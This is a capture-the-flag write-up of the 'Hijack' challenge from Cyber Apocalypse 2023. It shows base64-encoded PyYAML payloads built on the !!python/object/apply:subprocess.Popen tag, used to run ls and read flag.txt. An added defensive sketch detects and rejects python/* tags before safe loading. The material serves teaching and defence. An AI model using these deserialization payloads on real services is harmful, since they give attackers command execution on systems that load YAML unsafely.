misc

Cyber Apocalypse 2023

Hijack

Solved by Starry-Lord

Connect to the Docker instance with nc, then create a config and decode the base64. We can see it gives back YAML syntax, so we can try to inject commands with subprocess.Popen.

After base64-encoding the payload below and using the “Load config” option, this worked!

!!python/object/apply:subprocess.Popen
- ls

I had to dig a little more to find how to give arguments to the command:

!!python/object/apply:subprocess.Popen
- !!python/tuple
  - ls
  - -la

And solved:

!!python/object/apply:subprocess.Popen
- !!python/tuple
  - cat
  - flag.txt
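
For the defensive side, here is an added example (not code from the challenge or from this write-up). It assumes the service parses the decoded config with PyYAML's unsafe loader, which is what the !!python/object/apply tag needs in order to run. The sketch composes the document without constructing any objects, names the python/* tags it finds, and only then loads with yaml.safe_load. The benign config keys are made up.

```python
import base64
import yaml  # PyYAML

YAML_NS = "tag:yaml.org,2002:"  # what the "!!" tag handle expands to

def python_tags(node, found=None, seen=None):
    """Collect python/* tags from a composed node graph; nothing is constructed."""
    found = [] if found is None else found
    seen = set() if seen is None else seen
    if node is None or id(node) in seen:  # empty document, or an alias cycle
        return found
    seen.add(id(node))
    if node.tag.startswith(YAML_NS + "python/"):
        found.append(node.tag[len(YAML_NS):])
    children = []
    if isinstance(node, yaml.SequenceNode):
        children = node.value
    elif isinstance(node, yaml.MappingNode):
        children = [n for pair in node.value for n in pair]
    for child in children:
        python_tags(child, found, seen)
    return found

def scan_config(b64_blob):
    """Return (yaml_text, python_tags) for a base64-encoded config."""
    text = base64.b64decode(b64_blob, validate=True).decode("utf-8")
    return text, python_tags(yaml.compose(text, Loader=yaml.SafeLoader))

def load_config(b64_blob):
    """Load a base64 config with safe_load, rejecting and naming any python/* tag."""
    text, tags = scan_config(b64_blob)
    if tags:
        raise ValueError("config rejected, python tags: " + ", ".join(tags))
    return yaml.safe_load(text)

def is_rejected(b64_blob):
    try:
        load_config(b64_blob)
    except (ValueError, yaml.YAMLError):
        return True
    return False

# The write-up's second payload, and a constructed benign config (keys are made up).
PAYLOAD = base64.b64encode(
    b"!!python/object/apply:subprocess.Popen\n- !!python/tuple\n  - ls\n  - -la\n")
BENIGN = base64.b64encode(b"mode: auto\nthreshold: 21\n")

if __name__ == "__main__":
    print(is_rejected(PAYLOAD), scan_config(PAYLOAD)[1], load_config(BENIGN))
```

yaml.safe_load on its own already refuses these tags with a ConstructorError; the compose pass is there so the rejection can be logged with the exact tag that was submitted.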

Published on: 27 Mar 2023